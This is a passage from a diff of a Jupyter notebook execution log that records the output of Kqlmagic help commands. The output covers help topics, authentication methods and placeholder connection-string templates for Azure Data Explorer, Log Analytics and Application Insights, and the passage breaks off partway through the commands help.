+    "executionTime": "2019-08-15T21:15:56.180Z"
+   },
+   {
+    "cell": {
+     "executionCount": 11,
+     "executionEventId": "e1650986-d280-40f1-9539-478d0c30d660",
+     "hasError": false,
+     "id": "c591dfa1-6746-4363-ad43-da0e669ecb0b",
+     "outputs": [
+      {
+       "data": {
+        "text/html": "<h2>Overview</h2>\n<p>Help command is a tool to get more information on a topics that are relevant to Kqlmagic.\nt\nusage: <code>%kql --help \"topic\"</code><br></p>\n<h2>Topics</h2>\n<ul>\n<li>\n<p><strong>usage</strong> - How to use the Kqlmagic.<br>\n<br></p>\n</li>\n<li>\n<p><strong>conn</strong> - Lists the available connection string variation, and how their are used to authenticatie to data sources.<br>\n<br></p>\n</li>\n<li>\n<p><strong>query</strong> / <strong>kql</strong> - <a href=\"http://aka.ms/kdocs\">Reference to resources Kusto Queru language, aka kql, documentation</a><br>\n<br></p>\n</li>\n<li>\n<p><strong>options</strong> - Lists the available options, and their behavior impact on the submit query command.<br>\n<br></p>\n</li>\n<li>\n<p><strong>commands</strong> - Lists the available commands, and what they do.<br>\n<br></p>\n</li>\n<li>\n<p><strong>faq</strong> - Lists frequently asked quetions and answers.<br>\n<br></p>\n</li>\n<li>\n<p><strong>help</strong> - This help.<br>\n<br></p>\n</li>\n<li>\n<p><strong>AzureMonitor</strong>- <a href=\"https://docs.microsoft.com/azure/azure-monitor/\">Reference to resources Azure Monitor tools</a><br>\nAzure Monitor, which now includes Log Analytics and Application Insights, provides sophisticated tools for collecting and analyzing telemetry that allow you to maximize the performance and availability of your cloud and on-premises resources and applications. It helps you understand how your applications are performing and proactively identifies issues affecting them and the resources they depend on.\n<br></p>\n</li>\n<li>\n<p><strong>AzureDataExplorer</strong> / <strong>kusto</strong>- <a href=\"https://docs.microsoft.com/azure/data-explorer/\">Reference to resources Azure Data Explorer (kusto) service</a><br>\nAzure Data Explorer is a fast and highly scalable data exploration service for log and telemetry data. It helps you handle the many data streams emitted by modern software, so you can collect, store, and analyze data. Azure Data Explorer is ideal for analyzing large volumes of diverse data from any data source, such as websites, applications, IoT devices, and more.\n<br></p>\n</li>\n<li>\n<p><strong>LogAnalytics</strong>- <a href=\"https://docs.microsoft.com/azure/log-analytics/log-analytics-queries?toc=/azure/azure-monitor/toc.json\">Reference to resources Log Analytics service</a><br>\nLog data collected by Azure Monitor is stored in Log Analytics which collects telemetry and other data from a variety of sources and provides a query language for advanced analytics.\n<br></p>\n</li>\n<li>\n<p><strong>ApplicationInsights</strong> / <strong>AppInsights</strong>- <a href=\"https://docs.microsoft.com/azure/application-insights/app-insights-overview?toc=/azure/azure-monitor/toc.json\">Reference to resources Application Insights service</a><br>\nApplication Insights is an extensible Application Performance Management (APM) service for web developers on multiple platforms. Use it to monitor your live web application. It will automatically detect performance anomalies. It includes powerful analytics tools to help you diagnose issues and to understand what users actually do with your app. It's designed to help you continuously improve performance and usability. It works for apps on a wide variety of platforms including .NET, Node.js and J2EE, hosted on-premises or in the cloud. It integrates with your DevOps process, and has connection points to a variety of development tools. It can monitor and analyze telemetry from mobile apps by integrating with Visual Studio App Center.\n<br></p>\n</li>\n</ul>\n<h2>Need Support?</h2>\n<ul>\n<li><strong>Have a feature request for Kqlmagic?</strong> Please post it on <a href=\"https://feedback.azure.com/forums/913690-azure-monitor\">User Voice</a> to help us prioritize</li>\n<li><strong>Have a technical question?</strong> Ask on <a href=\"https://stackoverflow.com/questions/tagged/Kqlmagic\">Stack Overflow with tag \"Kqlmagic\"</a></li>\n<li><strong>Need Support?</strong> Every customer with an active Azure subscription has access to <a href=\"https://docs.microsoft.com/azure/azure-supportability/how-to-create-azure-support-request\">support</a> with guaranteed response time.  Consider submitting a ticket and get assistance from Microsoft support team</li>\n<li><strong>Found a bug?</strong> Please help us fix it by thoroughly documenting it and <a href=\"https://github.com/Microsoft/jupyter-Kqlmagic/issues/new\">filing an issue</a>.</li>\n</ul>",
+        "text/markdown": "## Overview\nHelp command is a tool to get more information on a topics that are relevant to Kqlmagic.\nt\nusage: ```%kql --help \"topic\"```<br>\n\n## Topics\n- **usage** - How to use the Kqlmagic.<br>\n<br>\n\n- **conn** - Lists the available connection string variation, and how their are used to authenticatie to data sources.<br>\n<br>\n\n- **query** / **kql** - [Reference to resources Kusto Queru language, aka kql, documentation](http://aka.ms/kdocs)<br>\n<br>\n\n- **options** - Lists the available options, and their behavior impact on the submit query command.<br>\n<br>\n\n- **commands** - Lists the available commands, and what they do.<br>\n<br>\n\n- **faq** - Lists frequently asked quetions and answers.<br>\n<br>\n\n- **help** - This help.<br>\n<br>\n\n- **AzureMonitor**- [Reference to resources Azure Monitor tools](https://docs.microsoft.com/azure/azure-monitor/)<br>\nAzure Monitor, which now includes Log Analytics and Application Insights, provides sophisticated tools for collecting and analyzing telemetry that allow you to maximize the performance and availability of your cloud and on-premises resources and applications. It helps you understand how your applications are performing and proactively identifies issues affecting them and the resources they depend on.\n<br>\n\n- **AzureDataExplorer** / **kusto**- [Reference to resources Azure Data Explorer (kusto) service](https://docs.microsoft.com/azure/data-explorer/)<br>\nAzure Data Explorer is a fast and highly scalable data exploration service for log and telemetry data. It helps you handle the many data streams emitted by modern software, so you can collect, store, and analyze data. Azure Data Explorer is ideal for analyzing large volumes of diverse data from any data source, such as websites, applications, IoT devices, and more.\n<br>\n\n- **LogAnalytics**- [Reference to resources Log Analytics service](https://docs.microsoft.com/azure/log-analytics/log-analytics-queries?toc=/azure/azure-monitor/toc.json)<br>\nLog data collected by Azure Monitor is stored in Log Analytics which collects telemetry and other data from a variety of sources and provides a query language for advanced analytics.\n<br>\n\n- **ApplicationInsights** / **AppInsights**- [Reference to resources Application Insights service](https://docs.microsoft.com/azure/application-insights/app-insights-overview?toc=/azure/azure-monitor/toc.json)<br>\nApplication Insights is an extensible Application Performance Management (APM) service for web developers on multiple platforms. Use it to monitor your live web application. It will automatically detect performance anomalies. It includes powerful analytics tools to help you diagnose issues and to understand what users actually do with your app. It's designed to help you continuously improve performance and usability. It works for apps on a wide variety of platforms including .NET, Node.js and J2EE, hosted on-premises or in the cloud. It integrates with your DevOps process, and has connection points to a variety of development tools. It can monitor and analyze telemetry from mobile apps by integrating with Visual Studio App Center.\n<br>\n\n\n## Need Support?\n- **Have a feature request for Kqlmagic?** Please post it on [User Voice](https://feedback.azure.com/forums/913690-azure-monitor) to help us prioritize\n- **Have a technical question?** Ask on [Stack Overflow with tag \"Kqlmagic\"](https://stackoverflow.com/questions/tagged/Kqlmagic)\n- **Need Support?** Every customer with an active Azure subscription has access to [support](https://docs.microsoft.com/azure/azure-supportability/how-to-create-azure-support-request) with guaranteed response time.  Consider submitting a ticket and get assistance from Microsoft support team\n- **Found a bug?** Please help us fix it by thoroughly documenting it and [filing an issue](https://github.com/Microsoft/jupyter-Kqlmagic/issues/new).\n",
+        "text/plain": "Overview\nHelp command is a tool to get more information on a topics that are relevant to Kqlmagic.\nt\nusage: %kql --help \"topic\"\nTopics\n\n\nusage - How to use the Kqlmagic.\n\n\n\nconn - Lists the available connection string variation, and how their are used to authenticatie to data sources.\n\n\n\nquery / kql - Reference to resources Kusto Queru language, aka kql, documentation\n\n\n\noptions - Lists the available options, and their behavior impact on the submit query command.\n\n\n\ncommands - Lists the available commands, and what they do.\n\n\n\nfaq - Lists frequently asked quetions and answers.\n\n\n\nhelp - This help.\n\n\n\nAzureMonitor- Reference to resources Azure Monitor tools\nAzure Monitor, which now includes Log Analytics and Application Insights, provides sophisticated tools for collecting and analyzing telemetry that allow you to maximize the performance and availability of your cloud and on-premises resources and applications. It helps you understand how your applications are performing and proactively identifies issues affecting them and the resources they depend on.\n\n\n\nAzureDataExplorer / kusto- Reference to resources Azure Data Explorer (kusto) service\nAzure Data Explorer is a fast and highly scalable data exploration service for log and telemetry data. It helps you handle the many data streams emitted by modern software, so you can collect, store, and analyze data. Azure Data Explorer is ideal for analyzing large volumes of diverse data from any data source, such as websites, applications, IoT devices, and more.\n\n\n\nLogAnalytics- Reference to resources Log Analytics service\nLog data collected by Azure Monitor is stored in Log Analytics which collects telemetry and other data from a variety of sources and provides a query language for advanced analytics.\n\n\n\nApplicationInsights / AppInsights- Reference to resources Application Insights service\nApplication Insights is an extensible Application Performance Management (APM) service for web developers on multiple platforms. Use it to monitor your live web application. It will automatically detect performance anomalies. It includes powerful analytics tools to help you diagnose issues and to understand what users actually do with your app. It's designed to help you continuously improve performance and usability. It works for apps on a wide variety of platforms including .NET, Node.js and J2EE, hosted on-premises or in the cloud. It integrates with your DevOps process, and has connection points to a variety of development tools. It can monitor and analyze telemetry from mobile apps by integrating with Visual Studio App Center.\n\n\n\nNeed Support?\n\nHave a feature request for Kqlmagic? Please post it on User Voice to help us prioritize\nHave a technical question? Ask on Stack Overflow with tag \"Kqlmagic\"\nNeed Support? Every customer with an active Azure subscription has access to support with guaranteed response time.  Consider submitting a ticket and get assistance from Microsoft support team\nFound a bug? Please help us fix it by thoroughly documenting it and filing an issue."
+       },
+       "execution_count": 11,
+       "metadata": {},
+       "output_type": "execute_result"
+      }
+     ],
+     "persistentId": "53af05b4-61af-4e19-9720-f03ca043969e",
+     "text": "%kql --help"
+    },
+    "executionTime": "2019-08-15T21:16:04.370Z"
+   },
+   {
+    "cell": {
+     "executionCount": 12,
+     "executionEventId": "42f289e2-0dfb-4dc5-8462-9b691081ca95",
+     "hasError": false,
+     "id": "c591dfa1-6746-4363-ad43-da0e669ecb0b",
+     "outputs": [
+      {
+       "data": {
+        "text/html": "<h2>Overview</h2>\n<ul>\n<li>To get data from Azure Monitor data resources, the user need to authenticate itself, and if it has the right permission, \nhe would be able to query that data resource.</li>\n<li>The current supported data sources are: Azure Data Explorer (kusto) clusters, Application Insights, Log Analytics and Cache.</li>\n<li>\n<p>Cache data source is not a real data source, it retrieves query results that were cached, but it can only retreive results queries that were executed before, new queries or modified queries won't work.\nto get more information on cache data source, execute <code>help \"cache\"</code></p>\n</li>\n<li>\n<p>The user can connect to multiple data resources.</p>\n</li>\n<li>Once a connection to a data resource is established, it gets a name of the form <resource>@<data-source>.</li>\n<li>\n<p>Reference to a data resource can be by connection string, connection name, or current connection (last connection used).</p>\n<ul>\n<li>If connection is not specified, current connection (last connection used) will be used.</li>\n<li>To submit queries, at least one connection to a data resource must be established.</li>\n</ul>\n</li>\n<li>\n<p>When a connection is specified, and it is a new connection string, the authentication and authorization is validated authomatically, by submiting \na validation query <code>range c from 1 to 10 step 1 | count</code>, and if the correct result returns, the connection is established.</p>\n</li>\n<li>\n<p>An initial connection can be specified as an environment variable.</p>\n<ul>\n<li>if specified it will be established when Kqlmagic loads.</li>\n<li>The variable name is <code>KQLMAGIC_CONNECTION_STR</code></li>\n</ul>\n</li>\n</ul>\n<h2>Authentication methods:</h2>\n<ul>\n<li>AAD Username/password - Provide your AAD username and password.</li>\n<li>AAD application - Provide your AAD tenant ID, AAD app ID and app secret.</li>\n<li>AAD code - Provide only your AAD username, and authenticate yourself using a code, generated by ADAL.</li>\n<li>certificate - Provide your AAD tenant ID, AAD app ID, certificate and certificate-thumbprint (supported only with Azure Data Explorer)</li>\n<li>appid/appkey - Provide you application insight appid, and appkey (supported only with Application Insights)</li>\n<li>anonymous - No authentication. For the case that you run your data source locally.</li>\n</ul>\n<h2>Connect to Azure Data Explorer (kusto) data resource <code>&lt;database or alias&gt;@&lt;cluster&gt;</code></h2>\n<p>Few options to authenticate with Azure Data Explorer (Kusto) data resources:<br>\n<code>%kql azuredataexplorer://code;cluster='&lt;cluster-name&gt;';database='&lt;database-name&gt;';alias='&lt;database-friendly-name&gt;'</code><br><br>\n<code>%kql azuredataexplorer://tenant='&lt;tenant-id&gt;';clientid='&lt;aad-appid&gt;';clientsecret='&lt;aad-appkey&gt;';cluster='&lt;cluster-name&gt;';database='&lt;database-name&gt;';alias='&lt;database-friendly-name&gt;'</code><br><br>\n<code>%kql azuredataexplorer://tenant='&lt;tenant-id&gt;';certificate='&lt;certificate&gt;';certificate_thumbprint='&lt;thumbprint&gt;';cluster='&lt;cluster-name&gt;';database='&lt;database-name&gt;';alias='&lt;database-friendly-name&gt;'</code><br><br>\n<code>%kql azuredataexplorer://tenant='&lt;tenant-id&gt;';certificate_pem_file='&lt;pem_filename&gt;';certificate_thumbprint='&lt;thumbprint&gt;';cluster='&lt;cluster-name&gt;';database='&lt;database-name&gt;';alias='&lt;database-friendly-name&gt;'</code><br><br>\n<code>%kql azuredataexplorer://username='&lt;username&gt;';password='&lt;password&gt;';cluster='&lt;cluster-name&gt;';database='&lt;database-name&gt;';alias='&lt;database-friendly-name&gt;'</code><br><br>\n<code>%kql azuredataexplorer://anonymous;cluster='&lt;cluster-name&gt;';database='&lt;database-name&gt;';alias='&lt;database-friendly-name&gt;'</code><br><br></p>\n<p>Notes:<br>\n- username/password works only on corporate network.<br>\n- alias is optional.<br>\n- if credentials are missing, and a previous connection was established the credentials will be inherited.<br>\n- if secret (password / clientsecret / thumbprint) is missing, user will be prompted to provide it.<br>\n- if cluster is missing, and a previous connection was established the cluster will be inherited.<br>\n- if tenant is missing, and a previous connection was established the tenant will be inherited.<br>\n- if only the database change, a new connection can be set as follow: \n<code>&lt;new-database-name&gt;@&lt;cluster-name&gt;</code><br>\n- <strong>a not quoted value, is a python expression, that is evaluated and its result is used as the value. This is how you can parametrize the connection string</strong> </p>\n<h2>Connect to Log Analytics data resources <code>&lt;workspace or alias&gt;@loganalytics</code></h2>\n<p>Few options to authenticate with Log Analytics:<br>\n<code>%kql loganalytics://code;workspace='&lt;workspace-id&gt;';alias='&lt;workspace-friendly-name&gt;'</code><br><br>\n<code>%kql loganalytics://tenant='&lt;tenant-id&gt;';clientid='&lt;aad-appid&gt;';clientsecret='&lt;aad-appkey&gt;';workspace='&lt;workspace-id&gt;';alias='&lt;workspace-friendly-name&gt;'</code><br><br>\n<code>%kql loganalytics://username='&lt;username&gt;';password='&lt;password&gt;';workspace='&lt;workspace-id&gt;';alias='&lt;workspace-friendly-name&gt;'</code><br><br>\n<code>%kql loganalytics://anonymous;workspace='&lt;workspace-id&gt;';alias='&lt;workspace-friendly-name&gt;'</code><br><br></p>\n<p>Notes:<br>\n- authentication with appkey works only for the demo.<br>\n- username/password works only on corporate network.<br>\n- alias is optional.<br>\n- if credentials are missing, and a previous connection was established the credentials will be inherited.<br>\n- if secret (password / clientsecret) is missing, user will be prompted to provide it.<br>\n- if tenant is missing, and a previous connection was established the tenant will be inherited.<br>\n- <strong>a not quoted value, is a python expression, that is evaluated and its result is used as the value. This is how you can parametrize the connection string</strong></p>\n<h2>Connect to Application Insights data resources <code>&lt;appid or alias&gt;@appinsights</code></h2>\n<p>Few options to authenticate with Apllication Insights:<br><br>\n<code>%kql appinsights://appid='&lt;app-id&gt;';appkey='&lt;app-key&gt;';alias='&lt;appid-friendly-name&gt;'</code><br><br>\n<code>%kql appinsights://code;appid='&lt;app-id&gt;';alias='&lt;appid-friendly-name&gt;'</code><br><br>\n<code>%kql appinsights://tenant='&lt;tenant-id&gt;';clientid='&lt;aad-appid&gt;';clientsecret='&lt;aad-appkey&gt;';appid='&lt;app-id&gt;';alias='&lt;appid-friendly-name&gt;'</code><br><br>\n<code>%kql appinsights://username='&lt;username&gt;';password='&lt;password&gt;';appid='&lt;app-id&gt;';alias='&lt;appid-friendly-name&gt;'</code><br><br>\n<code>%kql appinsights://anonymous;appid='&lt;app-id&gt;';alias='&lt;appid-friendly-name&gt;'</code><br><br></p>\n<p>Notes:<br>\n- username/password works only on corporate network.<br>\n- alias is optional.<br>\n- if credentials are missing, and a previous connection was established the credentials will be inherited.<br>\n- if secret (password / clientsecret / appkey) is missing, user will be prompted to provide it.<br>\n- if tenant is missing, and a previous connection was established the tenant will be inherited.<br>\n- <strong>a not quoted value, is a python expression, that is evaluated and its result is used as the value. This is how you can parametrize the connection string</strong></p>\n<h2>Need Support?</h2>\n<ul>\n<li><strong>Have a feature request for Kqlmagic?</strong> Please post it on <a href=\"https://feedback.azure.com/forums/913690-azure-monitor\">User Voice</a> to help us prioritize</li>\n<li><strong>Have a technical question?</strong> Ask on <a href=\"https://stackoverflow.com/questions/tagged/Kqlmagic\">Stack Overflow with tag \"Kqlmagic\"</a></li>\n<li><strong>Need Support?</strong> Every customer with an active Azure subscription has access to <a href=\"https://docs.microsoft.com/azure/azure-supportability/how-to-create-azure-support-request\">support</a> with guaranteed response time.  Consider submitting a ticket and get assistance from Microsoft support team</li>\n<li><strong>Found a bug?</strong> Please help us fix it by thoroughly documenting it and <a href=\"https://github.com/Microsoft/jupyter-Kqlmagic/issues/new\">filing an issue</a>.</li>\n</ul>",
+        "text/markdown": "## Overview\n- To get data from Azure Monitor data resources, the user need to authenticate itself, and if it has the right permission, \nhe would be able to query that data resource.\n- The current supported data sources are: Azure Data Explorer (kusto) clusters, Application Insights, Log Analytics and Cache.\n- Cache data source is not a real data source, it retrieves query results that were cached, but it can only retreive results queries that were executed before, new queries or modified queries won't work.\nto get more information on cache data source, execute ```help \"cache\"```\n\n- The user can connect to multiple data resources.\n- Once a connection to a data resource is established, it gets a name of the form <resource>@<data-source>.\n- Reference to a data resource can be by connection string, connection name, or current connection (last connection used).\n    - If connection is not specified, current connection (last connection used) will be used.\n    - To submit queries, at least one connection to a data resource must be established.\n\n- When a connection is specified, and it is a new connection string, the authentication and authorization is validated authomatically, by submiting \na validation query ```range c from 1 to 10 step 1 | count```, and if the correct result returns, the connection is established.\n\n- An initial connection can be specified as an environment variable.\n    - if specified it will be established when Kqlmagic loads.\n    - The variable name is ```KQLMAGIC_CONNECTION_STR```\n\n## Authentication methods:\n\n* AAD Username/password - Provide your AAD username and password.\n* AAD application - Provide your AAD tenant ID, AAD app ID and app secret.\n* AAD code - Provide only your AAD username, and authenticate yourself using a code, generated by ADAL.\n* certificate - Provide your AAD tenant ID, AAD app ID, certificate and certificate-thumbprint (supported only with Azure Data Explorer)\n* appid/appkey - Provide you application insight appid, and appkey (supported only with Application Insights)\n* anonymous - No authentication. For the case that you run your data source locally.\n\n## Connect to Azure Data Explorer (kusto) data resource ```<database or alias>@<cluster>```\nFew options to authenticate with Azure Data Explorer (Kusto) data resources:<br>\n```%kql azuredataexplorer://code;cluster='<cluster-name>';database='<database-name>';alias='<database-friendly-name>'```<br><br>\n```%kql azuredataexplorer://tenant='<tenant-id>';clientid='<aad-appid>';clientsecret='<aad-appkey>';cluster='<cluster-name>';database='<database-name>';alias='<database-friendly-name>'```<br><br>\n```%kql azuredataexplorer://tenant='<tenant-id>';certificate='<certificate>';certificate_thumbprint='<thumbprint>';cluster='<cluster-name>';database='<database-name>';alias='<database-friendly-name>'```<br><br>\n```%kql azuredataexplorer://tenant='<tenant-id>';certificate_pem_file='<pem_filename>';certificate_thumbprint='<thumbprint>';cluster='<cluster-name>';database='<database-name>';alias='<database-friendly-name>'```<br><br>\n```%kql azuredataexplorer://username='<username>';password='<password>';cluster='<cluster-name>';database='<database-name>';alias='<database-friendly-name>'```<br><br>\n```%kql azuredataexplorer://anonymous;cluster='<cluster-name>';database='<database-name>';alias='<database-friendly-name>'```<br><br>\n\nNotes:<br>\n- username/password works only on corporate network.<br>\n- alias is optional.<br>\n- if credentials are missing, and a previous connection was established the credentials will be inherited.<br>\n- if secret (password / clientsecret / thumbprint) is missing, user will be prompted to provide it.<br>\n- if cluster is missing, and a previous connection was established the cluster will be inherited.<br>\n- if tenant is missing, and a previous connection was established the tenant will be inherited.<br>\n- if only the database change, a new connection can be set as follow: \n```<new-database-name>@<cluster-name>```<br>\n- **a not quoted value, is a python expression, that is evaluated and its result is used as the value. This is how you can parametrize the connection string** \n\n## Connect to Log Analytics data resources ```<workspace or alias>@loganalytics```\nFew options to authenticate with Log Analytics:<br>\n```%kql loganalytics://code;workspace='<workspace-id>';alias='<workspace-friendly-name>'```<br><br>\n```%kql loganalytics://tenant='<tenant-id>';clientid='<aad-appid>';clientsecret='<aad-appkey>';workspace='<workspace-id>';alias='<workspace-friendly-name>'```<br><br>\n```%kql loganalytics://username='<username>';password='<password>';workspace='<workspace-id>';alias='<workspace-friendly-name>'```<br><br>\n```%kql loganalytics://anonymous;workspace='<workspace-id>';alias='<workspace-friendly-name>'```<br><br>\n\nNotes:<br>\n- authentication with appkey works only for the demo.<br>\n- username/password works only on corporate network.<br>\n- alias is optional.<br>\n- if credentials are missing, and a previous connection was established the credentials will be inherited.<br>\n- if secret (password / clientsecret) is missing, user will be prompted to provide it.<br>\n- if tenant is missing, and a previous connection was established the tenant will be inherited.<br>\n- **a not quoted value, is a python expression, that is evaluated and its result is used as the value. This is how you can parametrize the connection string**\n\n\n## Connect to Application Insights data resources ```<appid or alias>@appinsights```\nFew options to authenticate with Apllication Insights:<br><br>\n```%kql appinsights://appid='<app-id>';appkey='<app-key>';alias='<appid-friendly-name>'```<br><br>\n```%kql appinsights://code;appid='<app-id>';alias='<appid-friendly-name>'```<br><br>\n```%kql appinsights://tenant='<tenant-id>';clientid='<aad-appid>';clientsecret='<aad-appkey>';appid='<app-id>';alias='<appid-friendly-name>'```<br><br>\n```%kql appinsights://username='<username>';password='<password>';appid='<app-id>';alias='<appid-friendly-name>'```<br><br>\n```%kql appinsights://anonymous;appid='<app-id>';alias='<appid-friendly-name>'```<br><br>\n\nNotes:<br>\n- username/password works only on corporate network.<br>\n- alias is optional.<br>\n- if credentials are missing, and a previous connection was established the credentials will be inherited.<br>\n- if secret (password / clientsecret / appkey) is missing, user will be prompted to provide it.<br>\n- if tenant is missing, and a previous connection was established the tenant will be inherited.<br>\n- **a not quoted value, is a python expression, that is evaluated and its result is used as the value. This is how you can parametrize the connection string**\n\n\n## Need Support?\n- **Have a feature request for Kqlmagic?** Please post it on [User Voice](https://feedback.azure.com/forums/913690-azure-monitor) to help us prioritize\n- **Have a technical question?** Ask on [Stack Overflow with tag \"Kqlmagic\"](https://stackoverflow.com/questions/tagged/Kqlmagic)\n- **Need Support?** Every customer with an active Azure subscription has access to [support](https://docs.microsoft.com/azure/azure-supportability/how-to-create-azure-support-request) with guaranteed response time.  Consider submitting a ticket and get assistance from Microsoft support team\n- **Found a bug?** Please help us fix it by thoroughly documenting it and [filing an issue](https://github.com/Microsoft/jupyter-Kqlmagic/issues/new).\n",
+        "text/plain": "Overview\n\nTo get data from Azure Monitor data resources, the user need to authenticate itself, and if it has the right permission, \nhe would be able to query that data resource.\nThe current supported data sources are: Azure Data Explorer (kusto) clusters, Application Insights, Log Analytics and Cache.\n\nCache data source is not a real data source, it retrieves query results that were cached, but it can only retreive results queries that were executed before, new queries or modified queries won't work.\nto get more information on cache data source, execute help \"cache\"\n\n\nThe user can connect to multiple data resources.\n\nOnce a connection to a data resource is established, it gets a name of the form @.\n\nReference to a data resource can be by connection string, connection name, or current connection (last connection used).\n\nIf connection is not specified, current connection (last connection used) will be used.\nTo submit queries, at least one connection to a data resource must be established.\n\n\n\nWhen a connection is specified, and it is a new connection string, the authentication and authorization is validated authomatically, by submiting \na validation query range c from 1 to 10 step 1 | count, and if the correct result returns, the connection is established.\n\n\nAn initial connection can be specified as an environment variable.\n\nif specified it will be established when Kqlmagic loads.\nThe variable name is KQLMAGIC_CONNECTION_STR\n\n\n\nAuthentication methods:\n\nAAD Username/password - Provide your AAD username and password.\nAAD application - Provide your AAD tenant ID, AAD app ID and app secret.\nAAD code - Provide only your AAD username, and authenticate yourself using a code, generated by ADAL.\ncertificate - Provide your AAD tenant ID, AAD app ID, certificate and certificate-thumbprint (supported only with Azure Data Explorer)\nappid/appkey - Provide you application insight appid, and appkey (supported only with Application Insights)\nanonymous - No authentication. For the case that you run your data source locally.\n\nConnect to Azure Data Explorer (kusto) data resource <database or alias>@<cluster>\nFew options to authenticate with Azure Data Explorer (Kusto) data resources:\n%kql azuredataexplorer://code;cluster='<cluster-name>';database='<database-name>';alias='<database-friendly-name>'\n%kql azuredataexplorer://tenant='<tenant-id>';clientid='<aad-appid>';clientsecret='<aad-appkey>';cluster='<cluster-name>';database='<database-name>';alias='<database-friendly-name>'\n%kql azuredataexplorer://tenant='<tenant-id>';certificate='<certificate>';certificate_thumbprint='<thumbprint>';cluster='<cluster-name>';database='<database-name>';alias='<database-friendly-name>'\n%kql azuredataexplorer://tenant='<tenant-id>';certificate_pem_file='<pem_filename>';certificate_thumbprint='<thumbprint>';cluster='<cluster-name>';database='<database-name>';alias='<database-friendly-name>'\n%kql azuredataexplorer://username='<username>';password='<password>';cluster='<cluster-name>';database='<database-name>';alias='<database-friendly-name>'\n%kql azuredataexplorer://anonymous;cluster='<cluster-name>';database='<database-name>';alias='<database-friendly-name>'\nNotes:\n- username/password works only on corporate network.\n- alias is optional.\n- if credentials are missing, and a previous connection was established the credentials will be inherited.\n- if secret (password / clientsecret / thumbprint) is missing, user will be prompted to provide it.\n- if cluster is missing, and a previous connection was established the cluster will be inherited.\n- if tenant is missing, and a previous connection was established the tenant will be inherited.\n- if only the database change, a new connection can be set as follow: \n<new-database-name>@<cluster-name>\n- a not quoted value, is a python expression, that is evaluated and its result is used as the value. This is how you can parametrize the connection string \nConnect to Log Analytics data resources <workspace or alias>@loganalytics\nFew options to authenticate with Log Analytics:\n%kql loganalytics://code;workspace='<workspace-id>';alias='<workspace-friendly-name>'\n%kql loganalytics://tenant='<tenant-id>';clientid='<aad-appid>';clientsecret='<aad-appkey>';workspace='<workspace-id>';alias='<workspace-friendly-name>'\n%kql loganalytics://username='<username>';password='<password>';workspace='<workspace-id>';alias='<workspace-friendly-name>'\n%kql loganalytics://anonymous;workspace='<workspace-id>';alias='<workspace-friendly-name>'\nNotes:\n- authentication with appkey works only for the demo.\n- username/password works only on corporate network.\n- alias is optional.\n- if credentials are missing, and a previous connection was established the credentials will be inherited.\n- if secret (password / clientsecret) is missing, user will be prompted to provide it.\n- if tenant is missing, and a previous connection was established the tenant will be inherited.\n- a not quoted value, is a python expression, that is evaluated and its result is used as the value. This is how you can parametrize the connection string\nConnect to Application Insights data resources <appid or alias>@appinsights\nFew options to authenticate with Apllication Insights:\n%kql appinsights://appid='<app-id>';appkey='<app-key>';alias='<appid-friendly-name>'\n%kql appinsights://code;appid='<app-id>';alias='<appid-friendly-name>'\n%kql appinsights://tenant='<tenant-id>';clientid='<aad-appid>';clientsecret='<aad-appkey>';appid='<app-id>';alias='<appid-friendly-name>'\n%kql appinsights://username='<username>';password='<password>';appid='<app-id>';alias='<appid-friendly-name>'\n%kql appinsights://anonymous;appid='<app-id>';alias='<appid-friendly-name>'\nNotes:\n- username/password works only on corporate network.\n- alias is optional.\n- if credentials are missing, and a previous connection was established the credentials will be inherited.\n- if secret (password / clientsecret / appkey) is missing, user will be prompted to provide it.\n- if tenant is missing, and a previous connection was established the tenant will be inherited.\n- a not quoted value, is a python expression, that is evaluated and its result is used as the value. This is how you can parametrize the connection string\nNeed Support?\n\nHave a feature request for Kqlmagic? Please post it on User Voice to help us prioritize\nHave a technical question? Ask on Stack Overflow with tag \"Kqlmagic\"\nNeed Support? Every customer with an active Azure subscription has access to support with guaranteed response time.  Consider submitting a ticket and get assistance from Microsoft support team\nFound a bug? Please help us fix it by thoroughly documenting it and filing an issue."
+       },
+       "execution_count": 12,
+       "metadata": {},
+       "output_type": "execute_result"
+      }
+     ],
+     "persistentId": "53af05b4-61af-4e19-9720-f03ca043969e",
+     "text": "%kql --help \"conn\""
+    },
+    "executionTime": "2019-08-15T21:16:11.940Z"
+   },
+   {
+    "cell": {
+     "executionCount": 13,
+     "executionEventId": "19b502f1-d4fd-4baa-8f35-4b41840eed95",
+     "hasError": false,
+     "id": "c591dfa1-6746-4363-ad43-da0e669ecb0b",
+     "outputs": [
+      {
+       "data": {
+        "text/html": "<h2>Overview</h2>\n<p>Except submitting kql queries, few other commands are included that may help using the Kqlmagic.<br>\n- Only one command can be executed per magic transaction.<br>\n- A command must start with a double hyphen-minus <code>--</code><br>\n- If command is not specified, the default command <code>\"submit\"</code> is assumed, that submits the query.<br></p>\n<h2>Commands</h2>\n<p>The following commands are supported:<br>\n- <strong>submit</strong> - Execute the query and return result. <br>\n    - Options can be used to customize the behavior of the transaction.<br>\n    - The query can parametrized.<br>\n    - This is the default command.<br>\n<br></p>\n<ul>\n<li>\n<p><strong>version</strong> - Displays the current version string.<br>\n<br></p>\n</li>\n<li>\n<p><strong>usage</strong> - Displays usage of Kqlmagic.<br>\n<br></p>\n</li>\n<li>\n<p><strong>help \"topic\"</strong> - Displays information about the topic.<br></p>\n<ul>\n<li>To get the list of all the topics, execute <code>%kql --help \"help\"</code><br>\n<br></li>\n</ul>\n</li>\n<li>\n<p>**palette - Display information about the current or other named color palette.<br></p>\n<ul>\n<li>The behaviour of this command will change based on the specified option:</li>\n<li>-palette_name, -palette_colors, palette_reverse, -palette_desaturation, execute <code>%kql --palette -palette_name \"Reds\"</code><br>\n<br></li>\n</ul>\n</li>\n<li>\n<p>**palettes - Display information about all available palettes.<br></p>\n<ul>\n<li>The behaviour of this command will change based on the specified option:</li>\n<li>-palette_colors, palette_reverse, -palette_desaturation, execute <code>%kql --palettes -palette_desaturation 0.75</code><br>\n<br></li>\n</ul>\n</li>\n<li>\n<p><strong>schema \"database\"</strong> - Returns the database schema as a python dict (displayed as a json format). <br></p>\n<ul>\n<li>To get Azure Data Explorer database schema: <code>%kql --schema \"databasename@clustername\"</code><br></li>\n<li>To get application insights app schema: <code>%kql --schema \"appname@applicationinsights\"</code><br></li>\n<li>To get log analytics workspace schema: <code>%kql --schema \"workspacename@loganalytics\"</code><br></li>\n<li>To get current connection database schema <code>%kql --schema</code><br></li>\n<li>If -conn option is sepcified it will override the database value.<br>\n<br></li>\n</ul>\n</li>\n<li>\n<p>**cache - Enables caching query results to a cache folder, or disbale. <br></p>\n<ul>\n<li>To enable caching to folder XXX, execute: <code>%kql --cache 